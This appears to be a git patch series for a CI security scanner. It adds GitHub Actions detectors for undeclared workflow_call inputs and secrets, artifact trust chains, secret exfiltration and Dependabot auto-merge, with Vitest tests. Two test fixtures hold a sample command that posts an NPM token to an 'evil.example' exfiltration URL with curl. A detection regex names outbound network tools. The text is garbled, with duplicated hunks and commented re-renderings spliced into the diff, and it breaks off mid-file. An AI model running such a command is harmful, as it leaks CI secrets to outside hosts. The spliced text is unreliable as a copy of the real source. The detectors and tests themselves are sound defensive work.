null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-call-boundary.ts b/src/layer2-static/detectors/workflow-call-boundary.ts new file mode 100644 index 0000000..84b0f2c --- /dev/null +++ b/src/layer2-static/detectors/workflow-call-boundary.ts @@ -0,0 +1,112 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { extractWorkflowCallBoundaryContext } from "../workflow/analysis.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowCallBoundaryInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function collectExpressionKeys(textContent: string, prefix: "inputs" | "secrets"): Set { + const keys = new Set(); + const pattern = new RegExp(`${prefix}\\.([a-zA-Z0-9_-]+)`, "giu"); + + for (const match of textContent.matchAll(pattern)) { + const key = match[1]?.trim(); + if (!key) { + continue; + } + keys.add(key); + } + + return keys; +} + +export function detectWorkflowCallBoundary(input: WorkflowCallBoundaryInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const boundary = extractWorkflowCallBoundaryContext(input.parsed, facts); + if (!boundary.hasWorkflowCall) { + return []; + } + + const declaredInputs = new Set(boundary.declaredInputKeys); + const declaredSecrets = new Set(boundary.declaredSecretKeys); + const referencedInputs = collectExpressionKeys(input.textContent, "inputs"); + const referencedSecrets = collectExpressionKeys(input.textContent, "secrets"); + + const undeclaredInputs = Array.from(referencedInputs).filter((key) => !declaredInputs.has(key)); + const undeclaredSecrets = Array.from(referencedSecrets).filter( + (key) => !declaredSecrets.has(key), + ); + + const findings: Finding[] = []; + for (const inputKey of 
/**
 * Audits reusable workflows (`on: workflow_call`) for references to inputs
 * or secrets that are not declared in the workflow_call contract.
 * Undeclared references silently resolve to empty values for callers and
 * hide the real input/secret surface of the reusable workflow.
 */
export function detectWorkflowCallBoundary(input: WorkflowCallBoundaryInput): Finding[] {
  if (!isGitHubWorkflowPath(input.filePath)) {
    return [];
  }

  const facts = extractWorkflowFacts(input.parsed);
  if (!facts) {
    return [];
  }

  // Only applies to workflows that declare a workflow_call trigger.
  const boundary = extractWorkflowCallBoundaryContext(input.parsed, facts);
  if (!boundary.hasWorkflowCall) {
    return [];
  }

  const declaredInputs = new Set(boundary.declaredInputKeys);
  const declaredSecrets = new Set(boundary.declaredSecretKeys);
  // Text scan: every `inputs.X` / `secrets.X` expression used in the file.
  const referencedInputs = collectExpressionKeys(input.textContent, "inputs");
  const referencedSecrets = collectExpressionKeys(input.textContent, "secrets");

  const undeclaredInputs = Array.from(referencedInputs).filter((key) => !declaredInputs.has(key));
  const undeclaredSecrets = Array.from(referencedSecrets).filter(
    (key) => !declaredSecrets.has(key),
  );

  const findings: Finding[] = [];
  // One finding per undeclared input key.
  for (const inputKey of undeclaredInputs) {
    const evidence = buildFindingEvidence({
      textContent: input.textContent,
      searchTerms: [`inputs.${inputKey}`, "workflow_call"],
      fallbackValue: `workflow_call references undeclared input ${inputKey}`,
    });
    findings.push({
      rule_id: "workflow-call-boundary",
      finding_id: `WORKFLOW_CALL_BOUNDARY-INPUT-${input.filePath}-${inputKey}`,
      severity: "HIGH",
      category: "CI_PERMISSIONS",
      layer: "L2",
      file_path: input.filePath,
      location: { field: "on.workflow_call.inputs" },
      description: `workflow_call references undeclared input '${inputKey}'`,
      affected_tools: ["github-actions"],
      cve: null,
      owasp: ["ASI02"],
      cwe: "CWE-20",
      confidence: "HIGH",
      fixable: false,
      remediation_actions: [
        `Declare input '${inputKey}' under on.workflow_call.inputs with explicit type and required policy`,
      ],
      evidence: evidence?.evidence ?? null,
      suppressed: false,
    });
  }

  // One finding per undeclared secret key.
  for (const secretKey of undeclaredSecrets) {
    const evidence = buildFindingEvidence({
      textContent: input.textContent,
      searchTerms: [`secrets.${secretKey}`, "workflow_call"],
      fallbackValue: `workflow_call references undeclared secret ${secretKey}`,
    });
    findings.push({
      rule_id: "workflow-call-boundary",
      finding_id: `WORKFLOW_CALL_BOUNDARY-SECRET-${input.filePath}-${secretKey}`,
      severity: "HIGH",
      category: "CI_PERMISSIONS",
      layer: "L2",
      file_path: input.filePath,
      location: { field: "on.workflow_call.secrets" },
      description: `workflow_call references undeclared secret '${secretKey}'`,
      affected_tools: ["github-actions"],
      cve: null,
      owasp: ["ASI02"],
      cwe: "CWE-862",
      confidence: "HIGH",
      fixable: false,
      remediation_actions: [
        `Declare secret '${secretKey}' under on.workflow_call.secrets and pass only required values from callers`,
      ],
      evidence: evidence?.evidence ?? null,
      suppressed: false,
    });
  }

  return findings;
}
null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/engine.ts b/src/layer2-static/engine.ts index 3cf6455..78a8163 100644 --- a/src/layer2-static/engine.ts +++ b/src/layer2-static/engine.ts @@ -42,6 +42,8 @@ import { detectWorkflowHardcodedContainerCredentials } from "./detectors/workflo import { detectWorkflowUnredactedSecrets } from "./detectors/workflow-unredacted-secrets.js"; import { detectWorkflowBotConditions } from "./detectors/workflow-bot-conditions.js"; import { detectWorkflowPrTargetCheckoutHead } from "./detectors/workflow-pr-target-checkout-head.js"; +import { detectWorkflowArtifactTrustChain } from "./detectors/workflow-artifact-trust-chain.js"; +import { detectWorkflowCallBoundary } from "./detectors/workflow-call-boundary.js"; import { filterRegisteredAudits, type RegisteredAudit } from "./audits/registry.js"; import type { AuditPersona, RuntimeMode } from "../config.js"; import { FINDING_CATEGORIES, type Finding } from "../types/finding.js"; @@ -659,6 +661,28 @@ function buildFileAudits(): Array> { }) : [], }, + { + id: "workflow-artifact-trust-chain", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowArtifactTrustChain({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-call-boundary", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? 
detectWorkflowCallBoundary({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, { id: "hardcoded-container-credentials", run: ({ file, input }) => diff --git a/tests/layer2/workflow-artifact-trust-chain.test.ts b/tests/layer2/workflow-artifact-trust-chain.test.ts new file mode 100644 index 0000000..c04baab --- /dev/null +++ b/tests/layer2/workflow-artifact-trust-chain.test.ts @@ -0,0 +1,117 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowArtifactTrustChain } from "../../src/layer2-static/detectors/workflow-artifact-trust-chain"; + +describe("workflow artifact trust chain detector", () => { + it("flags untrusted artifact producer consumed by privileged job that executes commands", () => { + const findings = detectWorkflowArtifactTrustChain({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + build: + steps: + - uses: actions/upload-artifact@v4 + with: + name: dist + release: + needs: build + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: dist + - run: ./dist/release.sh +`, + parsed: { + on: ["pull_request"], + jobs: { + build: { + steps: [ + { + uses: "actions/upload-artifact@v4", + with: { + name: "dist", + }, + }, + ], + }, + release: { + needs: "build", + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/download-artifact@v4", + with: { + name: "dist", + }, + }, + { + run: "./dist/release.sh", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-artifact-trust-chain"); + }); + + it("does not flag artifact transfers on trusted triggers", () => { + const findings = detectWorkflowArtifactTrustChain({ + filePath: ".github/workflows/release.yml", + textContent: `on: [push] +jobs: + build: + steps: + - uses: actions/upload-artifact@v4 + with: + name: dist + release: + permissions: + contents: write + steps: + - uses: 
actions/download-artifact@v4 + with: + name: dist + - run: ./dist/release.sh +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/upload-artifact@v4", + with: { + name: "dist", + }, + }, + ], + }, + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/download-artifact@v4", + with: { + name: "dist", + }, + }, + { + run: "./dist/release.sh", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-call-boundary.test.ts b/tests/layer2/workflow-call-boundary.test.ts new file mode 100644 index 0000000..4eb1e65 --- /dev/null +++ b/tests/layer2/workflow-call-boundary.test.ts @@ -0,0 +1,133 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowCallBoundary } from "../../src/layer2-static/detectors/workflow-call-boundary"; + +describe("workflow call boundary detector", () => { + it("flags undeclared workflow_call secrets referenced by jobs", () => { + const findings = detectWorkflowCallBoundary({ + filePath: ".github/workflows/reusable.yml", + textContent: `on: + workflow_call: + inputs: + config_path: + required: true + type: string +jobs: + run: + steps: + - run: echo \${{ secrets.publish_token }} +`, + parsed: { + on: { + workflow_call: { + inputs: { + config_path: { + required: true, + type: "string", + }, + }, + }, + }, + jobs: { + run: { + steps: [ + { + run: "echo ${{ secrets.publish_token }}", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-call-boundary"); + expect(findings[0]?.description).toContain("secret"); + }); + + it("flags undeclared workflow_call inputs referenced by jobs", () => { + const findings = detectWorkflowCallBoundary({ + filePath: ".github/workflows/reusable.yml", + textContent: `on: + workflow_call: + secrets: + publish_token: + required: true +jobs: + run: + steps: + - run: echo \${{ inputs.channel }} +`, + parsed: { + on: { + 
workflow_call: { + secrets: { + publish_token: { + required: true, + }, + }, + }, + }, + jobs: { + run: { + steps: [ + { + run: "echo ${{ inputs.channel }}", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.description).toContain("input"); + }); + + it("does not flag when workflow_call references are explicitly declared", () => { + const findings = detectWorkflowCallBoundary({ + filePath: ".github/workflows/reusable.yml", + textContent: `on: + workflow_call: + inputs: + channel: + required: true + type: string + secrets: + publish_token: + required: true +jobs: + run: + steps: + - run: echo \${{ inputs.channel }} \${{ secrets.publish_token }} +`, + parsed: { + on: { + workflow_call: { + inputs: { + channel: { + required: true, + type: "string", + }, + }, + secrets: { + publish_token: { + required: true, + }, + }, + }, + }, + jobs: { + run: { + steps: [ + { + run: "echo ${{ inputs.channel }} ${{ secrets.publish_token }}", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-wave-f-engine.test.ts b/tests/layer2/workflow-wave-f-engine.test.ts index df58253..3215127 100644 --- a/tests/layer2/workflow-wave-f-engine.test.ts +++ b/tests/layer2/workflow-wave-f-engine.test.ts @@ -61,4 +61,106 @@ jobs: const ruleIds = new Set(findings.map((finding) => finding.rule_id)); expect(ruleIds.has("workflow-pr-target-checkout-head")).toBe(true); }); + + it("surfaces artifact trust-chain and workflow-call-boundary findings through runStaticEngine", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/release.yml", + format: "yaml", + textContent: `on: [pull_request] +jobs: + build: + steps: + - uses: actions/upload-artifact@v4 + with: + name: dist + release: + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: dist + - run: ./dist/release.sh +`, + parsed: { + 
on: ["pull_request"], + jobs: { + build: { + steps: [ + { + uses: "actions/upload-artifact@v4", + with: { + name: "dist", + }, + }, + ], + }, + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/download-artifact@v4", + with: { + name: "dist", + }, + }, + { + run: "./dist/release.sh", + }, + ], + }, + }, + }, + }, + { + filePath: ".github/workflows/reusable.yml", + format: "yaml", + textContent: `on: + workflow_call: + inputs: + config_path: + required: true + type: string +jobs: + run: + steps: + - run: echo \${{ secrets.publish_token }} +`, + parsed: { + on: { + workflow_call: { + inputs: { + config_path: { + required: true, + type: "string", + }, + }, + }, + }, + jobs: { + run: { + steps: [ + { + run: "echo ${{ secrets.publish_token }}", + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + const ruleIds = new Set(findings.map((finding) => finding.rule_id)); + expect(ruleIds.has("workflow-artifact-trust-chain")).toBe(true); + expect(ruleIds.has("workflow-call-boundary")).toBe(true); + }); }); diff --git a/tests/meta/workflow-audit-parity-contract.test.ts b/tests/meta/workflow-audit-parity-contract.test.ts index 2ff2e43..3f004a2 100644 --- a/tests/meta/workflow-audit-parity-contract.test.ts +++ b/tests/meta/workflow-audit-parity-contract.test.ts @@ -40,6 +40,8 @@ const expectedCheckedAuditIds = [ "hardcoded-container-credentials", "unredacted-secrets", "bot-conditions", + "workflow-call-boundary", + "workflow-artifact-trust-chain", "workflow-pr-target-checkout-head", ] as const; From 25bf6f8aeb0807d8c21449e9c4b7de91ec62650f Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 13:56:04 +0000 Subject: [PATCH 3/6] feat(workflow): add secret exfiltration workflow audit --- docs/workflow-audit-parity-checklist.md | 2 +- .../detectors/workflow-secret-exfiltration.ts | 121 ++++++++++++++++++ 
src/layer2-static/engine.ts | 13 ++ .../workflow-secret-exfiltration.test.ts | 84 ++++++++++++ tests/layer2/workflow-wave-f-engine.test.ts | 35 +++++ .../workflow-audit-parity-contract.test.ts | 1 + 6 files changed, 255 insertions(+), 1 deletion(-) create mode 100644 src/layer2-static/detectors/workflow-secret-exfiltration.ts create mode 100644 tests/layer2/workflow-secret-exfiltration.test.ts diff --git a/docs/workflow-audit-parity-checklist.md b/docs/workflow-audit-parity-checklist.md index 94d3d19..6dcfef4 100644 --- a/docs/workflow-audit-parity-checklist.md +++ b/docs/workflow-audit-parity-checklist.md @@ -59,7 +59,7 @@ Use this checklist to track the workflow-audit detectors implemented in CodeGate - [ ] `workflow-oidc-untrusted-context` - [x] `workflow-pr-target-checkout-head` - [ ] `workflow-dynamic-matrix-injection` -- [ ] `workflow-secret-exfiltration` +- [x] `workflow-secret-exfiltration` - [ ] `dependabot-auto-merge` - [ ] `workflow-local-action-mutation` diff --git a/src/layer2-static/detectors/workflow-secret-exfiltration.ts b/src/layer2-static/detectors/workflow-secret-exfiltration.ts new file mode 100644 index 0000000..f77d0af --- /dev/null +++ b/src/layer2-static/detectors/workflow-secret-exfiltration.ts @@ -0,0 +1,121 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowSecretExfiltrationInput { + filePath: string; + parsed: unknown; + textContent: string; + trustedApiDomains: string[]; +} + +const OUTBOUND_COMMAND_PATTERN = /\b(curl|wget|invoke-webrequest|httpie)\b/iu; +const SECRET_REFERENCE_PATTERN = /\$\{\{\s*secrets\.([a-zA-Z0-9_]+)\s*\}\}/giu; +const URL_PATTERN = /https?:\/\/[^\s"')]+/giu; + +function extractSecretReferences(value: string): string[] { + const references = new Set(); + for (const match of value.matchAll(SECRET_REFERENCE_PATTERN)) { + const key = 
match[1]?.trim(); + if (!key) { + continue; + } + references.add(key); + } + return Array.from(references); +} + +function extractUrls(value: string): string[] { + return Array.from(value.matchAll(URL_PATTERN), (match) => match[0] ?? "").filter(Boolean); +} + +function isTrustedHost(hostname: string, trustedApiDomains: string[]): boolean { + const normalizedHost = hostname.toLowerCase(); + return trustedApiDomains.some((domain) => { + const normalizedDomain = domain.toLowerCase(); + return normalizedHost === normalizedDomain || normalizedHost.endsWith(`.${normalizedDomain}`); + }); +} + +function hasOnlyTrustedUrls(run: string, trustedApiDomains: string[]): boolean { + const urls = extractUrls(run); + if (urls.length === 0) { + return false; + } + + return urls.every((url) => { + try { + const parsed = new URL(url); + return isTrustedHost(parsed.hostname, trustedApiDomains); + } catch { + return false; + } + }); +} + +export function detectWorkflowSecretExfiltration( + input: WorkflowSecretExfiltrationInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + if (!step.run || !OUTBOUND_COMMAND_PATTERN.test(step.run)) { + return; + } + + const referencedSecrets = extractSecretReferences(step.run); + if (referencedSecrets.length === 0) { + return; + } + + if (hasOnlyTrustedUrls(step.run, input.trustedApiDomains)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["secrets.", "curl", "wget", "http://", "https://"], + fallbackValue: `${job.id} step references secrets in outbound network command`, + }); + + findings.push({ + rule_id: "workflow-secret-exfiltration", + finding_id: `WORKFLOW_SECRET_EXFILTRATION-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "CRITICAL", 
/**
 * Flags run steps that pass `${{ secrets.* }}` values to outbound network
 * commands (curl/wget/Invoke-WebRequest/httpie) targeting anything other
 * than an allow-listed trusted API domain — a classic secret-exfiltration
 * shape.
 */
export function detectWorkflowSecretExfiltration(
  input: WorkflowSecretExfiltrationInput,
): Finding[] {
  if (!isGitHubWorkflowPath(input.filePath)) {
    return [];
  }

  const facts = extractWorkflowFacts(input.parsed);
  if (!facts) {
    return [];
  }

  const findings: Finding[] = [];

  facts.jobs.forEach((job, jobIndex) => {
    job.steps.forEach((step, stepIndex) => {
      // Only steps that shell out to a network-capable command are relevant.
      if (!step.run || !OUTBOUND_COMMAND_PATTERN.test(step.run)) {
        return;
      }

      // The command must actually reference secret context to be exfil-prone.
      const referencedSecrets = extractSecretReferences(step.run);
      if (referencedSecrets.length === 0) {
        return;
      }

      // Commands whose every URL targets a trusted domain are allowed; note a
      // command with no URL literal is NOT considered trusted (fails closed).
      if (hasOnlyTrustedUrls(step.run, input.trustedApiDomains)) {
        return;
      }

      const evidence = buildFindingEvidence({
        textContent: input.textContent,
        searchTerms: ["secrets.", "curl", "wget", "http://", "https://"],
        fallbackValue: `${job.id} step references secrets in outbound network command`,
      });

      findings.push({
        rule_id: "workflow-secret-exfiltration",
        finding_id: `WORKFLOW_SECRET_EXFILTRATION-${input.filePath}-${jobIndex}-${stepIndex}`,
        severity: "CRITICAL",
        category: "CI_PERMISSIONS",
        layer: "L2",
        file_path: input.filePath,
        location: { field: `jobs.${job.id}.steps[${stepIndex}].run` },
        description: "Workflow step sends secret context through outbound network command",
        affected_tools: ["github-actions"],
        cve: null,
        owasp: ["ASI02"],
        cwe: "CWE-200",
        confidence: "HIGH",
        fixable: false,
        remediation_actions: [
          "Avoid sending secrets through outbound shell commands",
          "Use trusted first-party actions with scoped credentials instead of ad-hoc exfil-prone scripts",
          "Restrict outbound domains and sanitize command arguments in privileged workflows",
        ],
        metadata: {
          // Names (not values) of the secrets referenced in the run command.
          referenced_secrets: referencedSecrets,
        },
        evidence: evidence?.evidence ?? null,
        suppressed: false,
      });
    });
  });

  return findings;
}
detectWorkflowSecretExfiltration({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + trustedApiDomains: input.config.trustedApiDomains, + }) + : [], + }, { id: "hardcoded-container-credentials", run: ({ file, input }) => diff --git a/tests/layer2/workflow-secret-exfiltration.test.ts b/tests/layer2/workflow-secret-exfiltration.test.ts new file mode 100644 index 0000000..efd3513 --- /dev/null +++ b/tests/layer2/workflow-secret-exfiltration.test.ts @@ -0,0 +1,84 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowSecretExfiltration } from "../../src/layer2-static/detectors/workflow-secret-exfiltration"; + +describe("workflow secret exfiltration detector", () => { + it("flags outbound network commands that include secrets context", () => { + const findings = detectWorkflowSecretExfiltration({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + release: + steps: + - run: curl -fsSL https://evil.example/exfil --data "token=\${{ secrets.NPM_TOKEN }}"\n`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + steps: [ + { + run: 'curl -fsSL https://evil.example/exfil --data "token=${{ secrets.NPM_TOKEN }}"', + }, + ], + }, + }, + }, + trustedApiDomains: [], + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-secret-exfiltration"); + expect(findings[0]?.severity).toBe("CRITICAL"); + }); + + it("does not flag trusted domains", () => { + const findings = detectWorkflowSecretExfiltration({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + release: + steps: + - run: curl -fsSL https://api.github.com/upload --data "token=\${{ secrets.GITHUB_TOKEN }}"\n`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + steps: [ + { + run: 'curl -fsSL https://api.github.com/upload --data "token=${{ secrets.GITHUB_TOKEN }}"', + }, + ], + }, + }, + }, + trustedApiDomains: ["api.github.com"], + }); + + 
expect(findings).toHaveLength(0); + }); + + it("does not flag commands without secrets context", () => { + const findings = detectWorkflowSecretExfiltration({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + release: + steps: + - run: curl -fsSL https://example.com/health\n`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + steps: [ + { + run: "curl -fsSL https://example.com/health", + }, + ], + }, + }, + }, + trustedApiDomains: [], + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-wave-f-engine.test.ts b/tests/layer2/workflow-wave-f-engine.test.ts index 3215127..5951a59 100644 --- a/tests/layer2/workflow-wave-f-engine.test.ts +++ b/tests/layer2/workflow-wave-f-engine.test.ts @@ -163,4 +163,39 @@ jobs: expect(ruleIds.has("workflow-artifact-trust-chain")).toBe(true); expect(ruleIds.has("workflow-call-boundary")).toBe(true); }); + + it("surfaces workflow-secret-exfiltration findings through runStaticEngine", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/release.yml", + format: "yaml", + textContent: `on: [pull_request] +jobs: + release: + steps: + - run: curl -fsSL https://evil.example/exfil --data "token=\${{ secrets.NPM_TOKEN }}"\n`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + steps: [ + { + run: 'curl -fsSL https://evil.example/exfil --data "token=${{ secrets.NPM_TOKEN }}"', + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + const ruleIds = new Set(findings.map((finding) => finding.rule_id)); + expect(ruleIds.has("workflow-secret-exfiltration")).toBe(true); + }); }); diff --git a/tests/meta/workflow-audit-parity-contract.test.ts b/tests/meta/workflow-audit-parity-contract.test.ts index 3f004a2..76488ca 100644 --- a/tests/meta/workflow-audit-parity-contract.test.ts +++ b/tests/meta/workflow-audit-parity-contract.test.ts 
@@ -43,6 +43,7 @@ const expectedCheckedAuditIds = [ "workflow-call-boundary", "workflow-artifact-trust-chain", "workflow-pr-target-checkout-head", + "workflow-secret-exfiltration", ] as const; function readChecklist(): string { From 7e5775e4e048a689c3102380809cd3f486fc8dbe Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 14:07:41 +0000 Subject: [PATCH 4/6] feat(workflow): complete wave-f detector set --- docs/workflow-audit-parity-checklist.md | 11 +- .../detectors/dependabot-auto-merge.ts | 146 ++++++++++++ .../workflow-dynamic-matrix-injection.ts | 185 ++++++++++++++++ .../workflow-local-action-mutation.ts | 158 +++++++++++++ .../workflow-oidc-untrusted-context.ts | 207 ++++++++++++++++++ src/layer2-static/engine.ts | 48 ++++ tests/layer2/dependabot-auto-merge.test.ts | 62 ++++++ .../workflow-dynamic-matrix-injection.test.ts | 70 ++++++ .../workflow-local-action-mutation.test.ts | 68 ++++++ .../workflow-oidc-untrusted-context.test.ts | 88 ++++++++ tests/layer2/workflow-wave-f-engine.test.ts | 129 +++++++++++ .../workflow-audit-parity-contract.test.ts | 4 + 12 files changed, 1170 insertions(+), 6 deletions(-) create mode 100644 src/layer2-static/detectors/dependabot-auto-merge.ts create mode 100644 src/layer2-static/detectors/workflow-dynamic-matrix-injection.ts create mode 100644 src/layer2-static/detectors/workflow-local-action-mutation.ts create mode 100644 src/layer2-static/detectors/workflow-oidc-untrusted-context.ts create mode 100644 tests/layer2/dependabot-auto-merge.test.ts create mode 100644 tests/layer2/workflow-dynamic-matrix-injection.test.ts create mode 100644 tests/layer2/workflow-local-action-mutation.test.ts create mode 100644 tests/layer2/workflow-oidc-untrusted-context.test.ts diff --git a/docs/workflow-audit-parity-checklist.md b/docs/workflow-audit-parity-checklist.md index 6dcfef4..53babc4 100644 --- a/docs/workflow-audit-parity-checklist.md +++ 
b/docs/workflow-audit-parity-checklist.md @@ -51,17 +51,16 @@ Use this checklist to track the workflow-audit detectors implemented in CodeGate - [x] `unredacted-secrets` - [x] `bot-conditions` -## Wave F (Planned) +## Wave F -- [ ] `workflow-call-boundary` - [x] `workflow-call-boundary` - [x] `workflow-artifact-trust-chain` -- [ ] `workflow-oidc-untrusted-context` +- [x] `workflow-oidc-untrusted-context` - [x] `workflow-pr-target-checkout-head` -- [ ] `workflow-dynamic-matrix-injection` +- [x] `workflow-dynamic-matrix-injection` - [x] `workflow-secret-exfiltration` -- [ ] `dependabot-auto-merge` -- [ ] `workflow-local-action-mutation` +- [x] `dependabot-auto-merge` +- [x] `workflow-local-action-mutation` ## Notes diff --git a/src/layer2-static/detectors/dependabot-auto-merge.ts b/src/layer2-static/detectors/dependabot-auto-merge.ts new file mode 100644 index 0000000..44e1670 --- /dev/null +++ b/src/layer2-static/detectors/dependabot-auto-merge.ts @@ -0,0 +1,146 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface DependabotAutoMergeInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const MERGE_COMMAND_PATTERN = + /\b(gh\s+pr\s+merge|gh\s+pr\s+review|gh\s+api\s+[^#\n]*\/pulls\/[^#\n]*\/merge)\b/iu; + +const MERGE_ACTIONS = new Set([ + "ahmadnassri/action-dependabot-auto-merge", + "hmarr/auto-approve-action", + "fastify/github-action-merge-dependabot", + "ad-m/github-push-action", + "peter-evans/create-pull-request", +]); + +function normalizeUses(value: string | undefined): string | null { + if (!value) { + return null; + } + const normalized = value.trim().toLowerCase(); + if (normalized.length === 0) { + return null; + } + const atIndex = normalized.indexOf("@"); + return atIndex === -1 ? 
normalized : normalized.slice(0, atIndex); +} + +function hasDependabotActorConstraint(condition: string | undefined): boolean { + if (!condition) { + return false; + } + const normalized = condition.toLowerCase(); + return ( + normalized.includes("dependabot[bot]") || + normalized.includes("dependabot-preview[bot]") || + normalized.includes("github.actor") || + normalized.includes("github.triggering_actor") + ); +} + +function hasStrictRepoBoundary(condition: string | undefined): boolean { + if (!condition) { + return false; + } + const normalized = condition.toLowerCase(); + return ( + normalized.includes("github.repository == github.event.pull_request.head.repo.full_name") || + normalized.includes("github.event.pull_request.head.repo.fork == false") || + normalized.includes("github.event.pull_request.user.login") || + normalized.includes("github.ref == 'refs/heads/main'") || + normalized.includes("github.base_ref == 'main'") + ); +} + +function isRiskyTrigger(trigger: string): boolean { + const normalized = trigger.trim().toLowerCase(); + return normalized === "pull_request_target" || normalized === "workflow_run"; +} + +export function detectDependabotAutoMerge(input: DependabotAutoMergeInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const riskyTrigger = facts.triggers.find((trigger) => isRiskyTrigger(trigger)); + if (!riskyTrigger) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const mergesByCommand = Boolean(step.run && MERGE_COMMAND_PATTERN.test(step.run)); + const mergesByAction = (() => { + const normalizedUses = normalizeUses(step.uses); + return normalizedUses ? MERGE_ACTIONS.has(normalizedUses) : false; + })(); + if (!mergesByCommand && !mergesByAction) { + return; + } + + const mergedCondition = step.if ?? 
job.if; + if (!hasDependabotActorConstraint(mergedCondition)) { + return; + } + if (hasStrictRepoBoundary(mergedCondition)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [ + "pull_request_target", + "dependabot[bot]", + "gh pr merge", + step.uses ?? "", + step.run ?? "", + ], + fallbackValue: `${job.id} auto-merge flow uses weak bot-only gating`, + }); + + findings.push({ + rule_id: "dependabot-auto-merge", + finding_id: `DEPENDABOT_AUTO_MERGE-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: riskyTrigger === "pull_request_target" ? "HIGH" : "MEDIUM", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { + field: step.run + ? `jobs.${job.id}.steps[${stepIndex}].run` + : `jobs.${job.id}.steps[${stepIndex}].uses`, + }, + description: + "Dependabot auto-merge flow relies on weak actor-only conditions in a privileged trigger context", + affected_tools: ["github-actions", "dependabot"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-285", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Require strict repository boundary checks before executing auto-merge operations", + "Avoid pull_request_target auto-merge flows unless actor, repo, and branch checks are explicit", + "Prefer dedicated Dependabot metadata and permission-check actions before merge approval", + ], + evidence: evidence?.evidence ?? 
